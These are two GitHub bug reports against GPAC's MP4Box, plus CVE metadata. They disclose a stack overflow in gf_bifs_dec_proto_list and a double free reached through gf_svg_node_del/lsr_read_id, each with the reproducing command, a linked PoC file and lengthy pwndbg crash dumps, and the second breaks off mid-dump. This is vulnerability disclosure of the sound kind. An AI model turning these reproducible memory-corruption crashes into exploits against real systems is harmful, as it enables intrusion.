Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A stack overflow was discovered in gf_bifs_dec_proto_list(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -lsr poc_8 ``` [poc_8.zip](https://github.com/gpac/gpac/files/7693778/poc_8.zip) **Result** ``` [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type stbk in parent minf [iso file] extra box maxr found in hinf, deleting [iso file] Track with no sample table ! [iso file] Track with no sample description box ! [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 832544 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type stbk in parent minf [iso file] extra box maxr found in hinf, deleting [iso file] Track with no sample table ! [iso file] Track with no sample description box ! [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 832544 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 BIFS Scene Parsing *** stack smashing detected ***: terminated [1] 3737450 abort ./MP4Box -lsr ./poc/poc_8 ``` **gdb** ``` *** stack smashing detected ***: terminated Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x0 *RBX 0x7ffff72bf040 ◂— 0x7ffff72bf040 *RCX 0x7ffff758218b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108] RDX 0x0 *RDI 0x2 *RSI 0x7fffffff68a0 ◂— 0x0 *R8 0x0 *R9 0x7fffffff68a0 ◂— 0x0 *R10 0x8 *R11 0x246 *R12 0x7fffffff6b20 ◂— 0x0 *R13 0x20 *R14 0x7ffff7ffb000 ◂— 0x202a2a2a00001000 *R15 0x1 *RBP 0x7fffffff6c20 —▸ 0x7ffff76f607c ◂— '*** %s ***: terminated\n' *RSP 0x7fffffff68a0 ◂— 0x0 *RIP 0x7ffff758218b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff758218b <raise+203> mov rax, qword ptr [rsp + 0x108] 0x7ffff7582193 <raise+211> xor rax, qword ptr fs:[0x28] 0x7ffff758219c <raise+220> jne raise+260 <raise+260> ↓ 0x7ffff75821c4 <raise+260> call __stack_chk_fail <__stack_chk_fail> 0x7ffff75821c9 nop dword ptr [rax] 0x7ffff75821d0 <killpg> endbr64 0x7ffff75821d4 <killpg+4> test edi, edi 0x7ffff75821d6 <killpg+6> js killpg+16 <killpg+16> 0x7ffff75821d8 <killpg+8> neg edi 0x7ffff75821da <killpg+10> jmp kill <kill> 0x7ffff75821df <killpg+15> nop ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsi r9 rsp 0x7fffffff68a0 ◂— 0x0 01:0008│ 0x7fffffff68a8 —▸ 0x7ffff7546278 ◂— 0x10001200005bb2 02:0010│ 0x7fffffff68b0 —▸ 0x7fffffff6c40 —▸ 0x5555555df3b0 ◂— 0x6b6 03:0018│ 0x7fffffff68b8 —▸ 0x7ffff7fe7c2e ◂— mov r11, rax 04:0020│ 0x7fffffff68c0 ◂— 0xcd2709f17adf5bb6 05:0028│ 0x7fffffff68c8 ◂— 0x0 06:0030│ 0x7fffffff68d0 ◂— 0x7 07:0038│ 0x7fffffff68d8 ◂— 0x1 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff758218b raise+203 f 1 0x7ffff7561859 abort+299 f 2 0x7ffff75cc3ee __libc_message+670 f 3 0x7ffff766eb4a __fortify_fail+42 f 4 0x7ffff766eb16 f 5 0x7ffff79064bc gf_bifs_dec_proto_list+2012 f 6 0xb6b6b6b6b6b6b6b6 f 7 0xb6b6b6b6b6b6b6b6 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff7561859 in __GI_abort () at abort.c:79 #2 0x00007ffff75cc3ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff76f607c "*** %s ***: terminated\n") at ../sysdeps/posix/libc_fatal.c:155 #3 0x00007ffff766eb4a in __GI___fortify_fail (msg=msg@entry=0x7ffff76f6064 "stack smashing detected") at fortify_fail.c:26 #4 0x00007ffff766eb16 in __stack_chk_fail () at stack_chk_fail.c:24 #5 0x00007ffff79064bc in gf_bifs_dec_proto_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #6 0xb6b6b6b6b6b6b6b6 in ?? () #7 0xb6b6b6b6b6b6b6b6 in ?? () #8 0xb6b6b6b6b6b6b6b6 in ?? () #9 0xb6b6b6b6b6b6b6b6 in ?? () #10 0xb6b6b6b6b6b6b6b6 in ?? () #11 0xb6b6b6b6b6b6b6b6 in ?? () #12 0xb6b6b6b6b6b6b6b6 in ?? () #13 0xb6b6b6b6b6b6b6b6 in ?? () #14 0xb6b6b6b6b6b6b6b6 in ?? () #15 0xb6b6b6b6b6b6b6b6 in ?? () #16 0xb6b6b6b6b6b6b6b6 in ?? () #17 0xb6b6b6b6b6b6b6b6 in ?? () #18 0xb6b6b6b6b6b6b6b6 in ?? () #19 0xb6b6b6b6b6b6b6b6 in ?? () #20 0xb6b6b6b6b6b6b6b6 in ?? () #21 0xb6b6b6b6b6b6b6b6 in ?? () #22 0xb6b6b6b6b6b6b6b6 in ?? () #23 0xb6b6b6b6b6b6b6b6 in ?? () #24 0xb6b6b6b6b6b6b6b6 in ?? () #25 0xb6b6b6b6b6b6b6b6 in ?? () #26 0xb6b6b6b6b6b6b6b6 in ?? () #27 0xb6b6b6b6b6b6b6b6 in ?? () #28 0xb6b6b6b6b6b6b6b6 in ?? () #29 0xb6b6b6b6b6b6b6b6 in ?? () #30 0xb6b6b6b6b6b6b6b6 in ?? () #31 0xb6b6b6b6b6b6b6b6 in ?? () #32 0xb6b6b6b6b6b6b6b6 in ?? () #33 0xb6b6b6b6b6b6b6b6 in ?? () #34 0xb6b6b6b6b6b6b6b6 in ?? () #35 0xb6b6b6b6b6b6b6b6 in ?? () #36 0xb6b6b6b6b6b6b6b6 in ?? () #37 0xb6b6b6b6b6b6b6b6 in ?? () #38 0xb6b6b6b6b6b6b6b6 in ?? () #39 0xb6b6b6b6b6b6b6b6 in ?? () #40 0xb6b6b6b6b6b6b6b6 in ?? () #41 0xb6b6b6b6b6b6b6b6 in ?? () #42 0xb6b6b6b6b6b6b6b6 in ?? () #43 0xb6b6b6b6b6b6b6b6 in ?? () #44 0xb6b6b6b6b6b6b6b6 in ?? () #45 0xb6b6b6b6b6b6b6b6 in ?? () #46 0xb6b6b6b6b6b6b6b6 in ?? () #47 0xb6b6b6b6b6b6b6b6 in ?? () #48 0xb6b6b6b6b6b6b6b6 in ?? () #49 0xb6b6b6b6b6b6b6b6 in ?? () #50 0xb6b6b6b6b6b6b6b6 in ?? () #51 0xb6b6b6b6b6b6b6b6 in ?? () #52 0xb6b6b6b6b6b6b6b6 in ?? () #53 0xb6b6b6b6b6b6b6b6 in ?? () #54 0xb6b6b6b6b6b6b6b6 in ?? () #55 0xb6b6b6b6b6b6b6b6 in ?? () #56 0xb6b6b6b6b6b6b6b6 in ?? () #57 0xb6b6b6b6b6b6b6b6 in ?? () #58 0xb6b6b6b6b6b6b6b6 in ?? () #59 0xb6b6b6b6b6b6b6b6 in ?? () #60 0xb6b6b6b6b6b6b6b6 in ?? () #61 0xb6b6b6b6b6b6b6b6 in ?? () #62 0xb6b6b6b6b6b6b6b6 in ?? () #63 0xb6b6b6b6b6b6b6b6 in ?? () #64 0xb6b6b6b6b6b6b6b6 in ?? () #65 0xb6b6b6b6b6b6b6b6 in ?? () #66 0xb6b6b6b6b6b6b6b6 in ?? () #67 0xb6b6b6b6b6b6b6b6 in ?? () #68 0xb6b6b6b6b6b6b6b6 in ?? () #69 0xb6b6b6b6b6b6b6b6 in ?? () #70 0xb6b6b6b6b6b6b6b6 in ?? () #71 0xb6b6b6b6b6b6b6b6 in ?? () #72 0xb6b6b6b6b6b6b6b6 in ?? () #73 0xb6b6b6b6b6b6b6b6 in ?? () #74 0xb6b6b6b6b6b6b6b6 in ?? () #75 0xb6b6b6b6b6b6b6b6 in ?? () #76 0xb6b6b6b6b6b6b6b6 in ?? () #77 0xb6b6b6b6b6b6b6b6 in ?? () #78 0xb6b6b6b6b6b6b6b6 in ?? () #79 0xb6b6b6b6b6b6b6b6 in ?? () #80 0xb6b6b6b6b6b6b6b6 in ?? () #81 0xb6b6b6b6b6b6b6b6 in ?? () #82 0xb6b6b6b6b6b6b6b6 in ?? () #83 0xb6b6b6b6b6b6b6b6 in ?? () #84 0xb6b6b6b6b6b6b6b6 in ?? () #85 0xb6b6b6b6b6b6b6b6 in ?? () #86 0xb6b6b6b6b6b6b6b6 in ?? () #87 0xb6b6b6b6b6b6b6b6 in ?? () #88 0xb6b6b6b6b6b6b6b6 in ?? () #89 0xb6b6b6b6b6b6b6b6 in ?? () #90 0xb6b6b6b6b6b6b6b6 in ?? () #91 0xb6b6b6b6b6b6b6b6 in ?? () #92 0xb6b6b6b6b6b6b6b6 in ?? () #93 0xb6b6b6b6b6b6b6b6 in ?? () #94 0xb6b6b6b6b6b6b6b6 in ?? () #95 0xb6b6b6b6b6b6b6b6 in ?? () #96 0xb6b6b6b6b6b6b6b6 in ?? () #97 0xb6b6b6b6b6b6b6b6 in ?? () #98 0x000080b6b6b6b6b6 in ?? () #99 0x0000000000000002 in ?? () #100 0x0000000000000044 in ?? () #101 0x0000000000000008 in ?? () #102 0x00005555555c7e60 in ?? () #103 0x00005555555cf500 in ?? () #104 0x0000000000000000 in ?? () ``` `break gf_bifs_dec_proto_list` ``` Breakpoint 1, 0x00007ffff7905ce0 in gf_bifs_dec_proto_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ──────────────────────────────────[ REGISTERS ]─────────────────────────────────── RAX 0x1 RBX 0x5555555d23b0 ◂— 0x0 RCX 0x710 RDX 0x5555555df2f0 ◂— 0x0 RDI 0x5555555de660 ◂— 0x0 RSI 0x5555555d23b0 ◂— 0x0 R8 0x0 R9 0x0 R10 0x7ffff775bc80 ◂— 'gf_sg_command_new' R11 0x7ffff7727be0 (main_arena+96) —▸ 0x5555555df320 ◂— 0x0 R12 0x5555555df2f0 ◂— 0x0 R13 0x5555555df1d0 ◂— 0x0 R14 0x5555555d42a0 ◂— 0x0 R15 0x0 RBP 0x5555555de660 ◂— 0x0 RSP 0x7fffffff7168 —▸ 0x7ffff7906559 (BD_DecSceneReplace+73) ◂— mov r12d, eax RIP 0x7ffff7905ce0 (gf_bifs_dec_proto_list) ◂— endbr64 ────────────────────────────────────[ DISASM ]──────────────────────────────────── ► 0x7ffff7905ce0 <gf_bifs_dec_proto_list> endbr64 0x7ffff7905ce4 <gf_bifs_dec_proto_list+4> push r15 0x7ffff7905ce6 <gf_bifs_dec_proto_list+6> push r14 0x7ffff7905ce8 <gf_bifs_dec_proto_list+8> push r13 0x7ffff7905cea <gf_bifs_dec_proto_list+10> mov r13, rsi 0x7ffff7905ced <gf_bifs_dec_proto_list+13> mov esi, 1 0x7ffff7905cf2 <gf_bifs_dec_proto_list+18> push r12 0x7ffff7905cf4 <gf_bifs_dec_proto_list+20> push rbp 0x7ffff7905cf5 <gf_bifs_dec_proto_list+21> push rbx 0x7ffff7905cf6 <gf_bifs_dec_proto_list+22> sub rsp, 0x488 0x7ffff7905cfd <gf_bifs_dec_proto_list+29> mov rax, qword ptr [rdi + 0x50] ────────────────────────────────────[ STACK ]───────────────────────────────────── 00:0000│ rsp 0x7fffffff7168 —▸ 0x7ffff7906559 (BD_DecSceneReplace+73) ◂— mov r12d, eax 01:0008│ 0x7fffffff7170 —▸ 0x5555555de660 ◂— 0x0 02:0010│ 0x7fffffff7178 —▸ 0x5555555df250 —▸ 0x5555555d4030 ◂— 0x0 03:0018│ 0x7fffffff7180 —▸ 0x5555555d23b0 ◂— 0x0 04:0020│ 0x7fffffff7188 —▸ 0x5555555df1d0 ◂— 0x0 05:0028│ 0x7fffffff7190 —▸ 0x5555555d42a0 ◂— 0x0 06:0030│ 0x7fffffff7198 —▸ 0x7ffff7914e5e (BM_SceneReplace+110) ◂— mov rsi, rbp 07:0038│ 0x7fffffff71a0 —▸ 0x5555555dea00 —▸ 0x5555555df1f0 —▸ 0x5555555df1a0 ◂— 0x0 ──────────────────────────────────[ BACKTRACE ]─────────────────────────────────── ► f 0 0x7ffff7905ce0 gf_bifs_dec_proto_list f 1 0x7ffff7906559 BD_DecSceneReplace+73 f 2 0x7ffff7914e5e BM_SceneReplace+110 f 3 0x7ffff7915023 BM_ParseCommand+179 f 4 0x7ffff7915353 gf_bifs_decode_command_list+163 f 5 0x7ffff7aa1d91 gf_sm_load_run_isom+1217 f 6 0x5555555844a8 dump_isom_scene+760 f 7 0x55555557b42c mp4boxMain+9228 ────────────────────────────────────────────────────────────────────────────────── pwndbg> c Continuing. Breakpoint 1, 0x00007ffff7905ce0 in gf_bifs_dec_proto_list () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ──────────────────────────────────[ REGISTERS ]─────────────────────────────────── *RAX 0x0 *RBX 0x5555555df330 ◂— 0x6b6 *RCX 0x5555555dfdf0 ◂— 0x0 *RDX 0x0 RDI 0x5555555de660 ◂— 0xfffffffd RSI 0x5555555d23b0 ◂— 0x0 *R8 0x5555555dfda0 —▸ 0x5555555df330 ◂— 0x6b6 *R9 0x7c *R10 0x7ffff775bf0a ◂— 'gf_sg_proto_get_graph' *R11 0x7ffff788b850 (gf_sg_proto_get_graph) ◂— endbr64 *R12 0x5555555de660 ◂— 0xfffffffd *R13 0x5555555d23b0 ◂— 0x0 R14 0x5555555d42a0 ◂— 0x0 *R15 0x7fffffff6d40 ◂— 0xb6b6b6b6b6b6b6b6 *RBP 0x6b6 *RSP 0x7fffffff6ca8 —▸ 0x7ffff79062d7 (gf_bifs_dec_proto_list+1527) ◂— mov dword ptr [rsp + 0x14], eax RIP 0x7ffff7905ce0 (gf_bifs_dec_proto_list) ◂— endbr64 ────────────────────────────────────[ DISASM ]──────────────────────────────────── ► 0x7ffff7905ce0 <gf_bifs_dec_proto_list> endbr64 0x7ffff7905ce4 <gf_bifs_dec_proto_list+4> push r15 0x7ffff7905ce6 <gf_bifs_dec_proto_list+6> push r14 0x7ffff7905ce8 <gf_bifs_dec_proto_list+8> push r13 0x7ffff7905cea <gf_bifs_dec_proto_list+10> mov r13, rsi 0x7ffff7905ced <gf_bifs_dec_proto_list+13> mov esi, 1 0x7ffff7905cf2 <gf_bifs_dec_proto_list+18> push r12 0x7ffff7905cf4 <gf_bifs_dec_proto_list+20> push rbp 0x7ffff7905cf5 <gf_bifs_dec_proto_list+21> push rbx 0x7ffff7905cf6 <gf_bifs_dec_proto_list+22> sub rsp, 0x488 0x7ffff7905cfd <gf_bifs_dec_proto_list+29> mov rax, qword ptr [rdi + 0x50] ────────────────────────────────────[ STACK ]───────────────────────────────────── 00:0000│ rsp 0x7fffffff6ca8 —▸ 0x7ffff79062d7 (gf_bifs_dec_proto_list+1527) ◂— mov dword ptr [rsp + 0x14], eax 01:0008│ 0x7fffffff6cb0 —▸ 0x7ffff775bc80 ◂— 'gf_sg_command_new' 02:0010│ 0x7fffffff6cb8 —▸ 0x5555555df330 ◂— 0x6b6 03:0018│ 0x7fffffff6cc0 ◂— 0xffff6d50 04:0020│ 0x7fffffff6cc8 —▸ 0x5555555de660 ◂— 0xfffffffd 05:0028│ 0x7fffffff6cd0 —▸ 0x5555555df2f0 —▸ 0x5555555dfda0 —▸ 0x5555555df330 ◂— 0x6b6 06:0030│ 0x7fffffff6cd8 —▸ 0x5555555d4030 ◂— 0x0 07:0038│ 0x7fffffff6ce0 ◂— 0x0 ──────────────────────────────────[ BACKTRACE ]─────────────────────────────────── ► f 0 0x7ffff7905ce0 gf_bifs_dec_proto_list f 1 0x7ffff79062d7 gf_bifs_dec_proto_list+1527 f 2 0xb6b6b6b6b6b6b6b6 f 3 0xb6b6b6b6b6b6b6b6 f 4 0xb6b6b6b6b6b6b6b6 f 5 0xb6b6b6b6b6b6b6b6 f 6 0xb6b6b6b6b6b6b6b6 f 7 0xb6b6b6b6b6b6b6b6 ────────────────────────────────────────────────────────────────────────────────── pwndbg> stack 200 00:0000│ rsp 0x7fffffff6ca8 —▸ 0x7ffff79062d7 (gf_bifs_dec_proto_list+1527) ◂— mov dword ptr [rsp + 0x14], eax 01:0008│ 0x7fffffff6cb0 —▸ 0x7ffff775bc80 ◂— 'gf_sg_command_new' 02:0010│ 0x7fffffff6cb8 —▸ 0x5555555df330 ◂— 0x6b6 03:0018│ 0x7fffffff6cc0 ◂— 0xffff6d50 04:0020│ 0x7fffffff6cc8 —▸ 0x5555555de660 ◂— 0xfffffffd 05:0028│ 0x7fffffff6cd0 —▸ 0x5555555df2f0 —▸ 0x5555555dfda0 —▸ 0x5555555df330 ◂— 0x6b6 06:0030│ 0x7fffffff6cd8 —▸ 0x5555555d4030 ◂— 0x0 07:0038│ 0x7fffffff6ce0 ◂— 0x0 ... ↓ 2 skipped 0a:0050│ 0x7fffffff6cf8 —▸ 0x7ffff7fc7000 —▸ 0x7ffff7743000 ◂— 0x10102464c457f 0b:0058│ 0x7fffffff6d00 —▸ 0x7fffffff6d90 ◂— 0xb6b6b6b6b6b6b6b6 0c:0060│ 0x7fffffff6d08 ◂— 0x0 0d:0068│ 0x7fffffff6d10 —▸ 0x7ffff7fc7000 —▸ 0x7ffff7743000 ◂— 0x10102464c457f 0e:0070│ 0x7fffffff6d18 —▸ 0x7ffff7fc7368 —▸ 0x7ffff7ffe450 —▸ 0x7ffff73131e0 —▸ 0x7ffff7ffe190 ◂— ... 0f:0078│ 0x7fffffff6d20 ◂— 0x0 10:0080│ 0x7fffffff6d28 ◂— 0x0 11:0088│ 0x7fffffff6d30 ◂— 0x1 12:0090│ 0x7fffffff6d38 ◂— 0x7fff00000001 13:0098│ r15 0x7fffffff6d40 ◂— 0xb6b6b6b6b6b6b6b6 ... ↓ 180 skipped pwndbg> ```

Stack Overflow in gf_bifs_dec_proto_list()

https://api.github.com/repos/gpac/gpac/issues/1970/comments

2021-12-10T15:36:08Z

2021-12-13T13:22:07Z

https://github.com/gpac/gpac/issues/1970

CVE-2021-45259

2021-12-22T17:15:09.310

An Invalid pointer reference vulnerability exists in gpac 1.1.0 via the gf_svg_node_del function, which causes a segmentation fault and application crash.

https://github.com/gpac/gpac/issues/1986

github.com

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ An Invalid free was discovered in gf_svg_node_del(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-rev1555-g339e7a736-master (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --prefix=/root/fuck_bin/gpac/test Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -bt poc ``` [gf_svg_node_del-gf_node_unregister.zip](https://github.com/gpac/gpac/files/7708298/gf_svg_node_del-gf_node_unregister.zip) **Result** ``` ┌─[root@aidai-virtual-machine] - [~/fuck_bin/gpac/results/fuckbt2] - [二 12月 14, 10:45] └─[$] <> ../../test/lib/MP4Box -bt lsr_read_anim_values_ex.part-lsr_read_animateTransform/id:000439,sig:11,src:004575+004803,op:splice,rep:2 [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 853091 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 853091 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 LASeR Scene Parsing [LASeR] memory overread - corrupted decoding [1] 3777658 segmentation fault ../../test/lib/MP4Box -bt ┌─[root@aidai-virtual-machine] - [~/fuck_bin/gpac/results/fuckbt2] - [二 12月 14, 10:45] └─[$] <> /root/fuck_bin/gpac/test/lib/MP4Box -bt gf_svg_node_del-gf_node_unregister/id:000409,sig:11,src:004547,op:havoc,rep:8 [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 853069 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 853069 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 LASeR Scene Parsing [LASeR] samerect coded in bitstream but no rect defined ! double free or corruption (out) [1] 3786815 abort /root/fuck_bin/gpac/test/lib/MP4Box -bt ``` **gdb** ``` Program received signal SIGABRT, Aborted. __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 50 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x0 RBX 0x7ffff72bf040 ◂— 0x7ffff72bf040 RCX 0x7ffff758218b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108] RDX 0x0 RDI 0x2 RSI 0x7fffffff6a30 ◂— 0x0 R8 0x0 R9 0x7fffffff6a30 ◂— 0x0 R10 0x8 R11 0x246 R12 0x7fffffff6ca0 ◂— 0x0 R13 0x10 R14 0x7ffff7ffb000 ◂— 0x62756f6400001000 R15 0x1 RBP 0x7fffffff6d80 —▸ 0x7ffff7727b80 (main_arena) ◂— 0x0 RSP 0x7fffffff6a30 ◂— 0x0 RIP 0x7ffff758218b (raise+203) ◂— mov rax, qword ptr [rsp + 0x108] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff758218b <raise+203> mov rax, qword ptr [rsp + 0x108] 0x7ffff7582193 <raise+211> xor rax, qword ptr fs:[0x28] 0x7ffff758219c <raise+220> jne raise+260 <raise+260> ↓ 0x7ffff75821c4 <raise+260> call __stack_chk_fail <__stack_chk_fail> 0x7ffff75821c9 nop dword ptr [rax] 0x7ffff75821d0 <killpg> endbr64 0x7ffff75821d4 <killpg+4> test edi, edi 0x7ffff75821d6 <killpg+6> js killpg+16 <killpg+16> 0x7ffff75821d8 <killpg+8> neg edi 0x7ffff75821da <killpg+10> jmp kill <kill> 0x7ffff75821df <killpg+15> nop ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsi r9 rsp 0x7fffffff6a30 ◂— 0x0 01:0008│ 0x7fffffff6a38 —▸ 0x7ffff7fe7c2e ◂— mov r11, rax 02:0010│ 0x7fffffff6a40 ◂— 0x2 03:0018│ 0x7fffffff6a48 —▸ 0x5555555e06e0 —▸ 0x5555555e0698 ◂— 0x0 04:0020│ 0x7fffffff6a50 ◂— 0x18 05:0028│ 0x7fffffff6a58 —▸ 0x5555555e06f0 —▸ 0x5555555e2758 ◂— 0x0 06:0030│ 0x7fffffff6a60 —▸ 0x5555555e37b0 —▸ 0x5555555e37d0 ◂— 0x8000000300000426 07:0038│ 0x7fffffff6a68 —▸ 0x5555555e06f0 —▸ 0x5555555e2758 ◂— 0x0 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff758218b raise+203 f 1 0x7ffff7561859 abort+299 f 2 0x7ffff75cc3ee __libc_message+670 f 3 0x7ffff75d447c f 4 0x7ffff75d6120 _int_free+1888 f 5 0x7ffff7b51c85 lsr_read_id+629 f 6 0x7ffff7b5e91b lsr_read_path+283 f 7 0x7ffff7b61822 lsr_read_update_content_model+770 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50 #1 0x00007ffff7561859 in __GI_abort () at abort.c:79 #2 0x00007ffff75cc3ee in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff76f6285 "%s\n") at ../sysdeps/posix/libc_fatal.c:155 #3 0x00007ffff75d447c in malloc_printerr (str=str@entry=0x7ffff76f8670 "double free or corruption (out)") at malloc.c:5347 #4 0x00007ffff75d6120 in _int_free (av=0x7ffff7727b80 <main_arena>, p=0x5555555e06e0, have_lock=<optimized out>) at malloc.c:4314 #5 0x00007ffff7b51c85 in lsr_read_id () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #6 0x00007ffff7b5e91b in lsr_read_path () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #7 0x00007ffff7b61822 in lsr_read_update_content_model () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #8 0x00007ffff7b59fc3 in lsr_read_command_list () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #9 0x00007ffff7b5ab74 in lsr_decode_laser_unit () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #10 0x00007ffff7b6239d in gf_laser_decode_command_list () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #11 0x00007ffff7aa3061 in gf_sm_load_run_isom () from /root/fuck_bin/gpac/test/lib/libgpac.so.10 #12 0x00005555555844a8 in dump_isom_scene () #13 0x000055555557b42c in mp4boxMain () #14 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe1e8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1d8) at ../csu/libc-start.c:308 #15 0x000055555556c45e in _start () ``` ``` Breakpoint 4, __GI___libc_free (mem=0x5555555e06f0) at malloc.c:3087 3087 in malloc.c LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x5555555e37b0 —▸ 0x5555555e37d0 ◂— 0x8000000300000426 RBX 0x5555555dc120 —▸ 0x5555555d1a00 ◂— 0x0 *RCX 0x27 *RDX 0xa *RDI 0x5555555e06f0 —▸ 0x5555555e2758 ◂— 0x0 *RSI 0xfffffff7 R8 0x1999999999999999 R9 0x0 R10 0x7ffff76daac0 (_nl_C_LC_CTYPE_toupper+512) ◂— 0x100000000 R11 0x7ffff76db3c0 (_nl_C_LC_CTYPE_class+256) ◂— 0x2000200020002 R12 0x1 *R13 0x3 R14 0x0 *R15 0x7fffffff6a50 ◂— 0x18 RBP 0x0 RSP 0x7fffffff6e18 —▸ 0x7ffff7b51c85 (lsr_read_id+629) ◂— mov qword ptr [r15 + 8], 0 RIP 0x7ffff75d9850 (free) ◂— endbr64 ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff75d9850 <free> endbr64 0x7ffff75d9854 <free+4> sub rsp, 0x18 0x7ffff75d9858 <free+8> mov rax, qword ptr [rip + 0x14d699] 0x7ffff75d985f <free+15> mov rax, qword ptr [rax] 0x7ffff75d9862 <free+18> test rax, rax 0x7ffff75d9865 <free+21> jne free+152 <free+152> 0x7ffff75d986b <free+27> test rdi, rdi 0x7ffff75d986e <free+30> je free+144 <free+144> 0x7ffff75d9870 <free+32> mov rax, qword ptr [rdi - 8] 0x7ffff75d9874 <free+36> lea rsi, [rdi - 0x10] 0x7ffff75d9878 <free+40> test al, 2 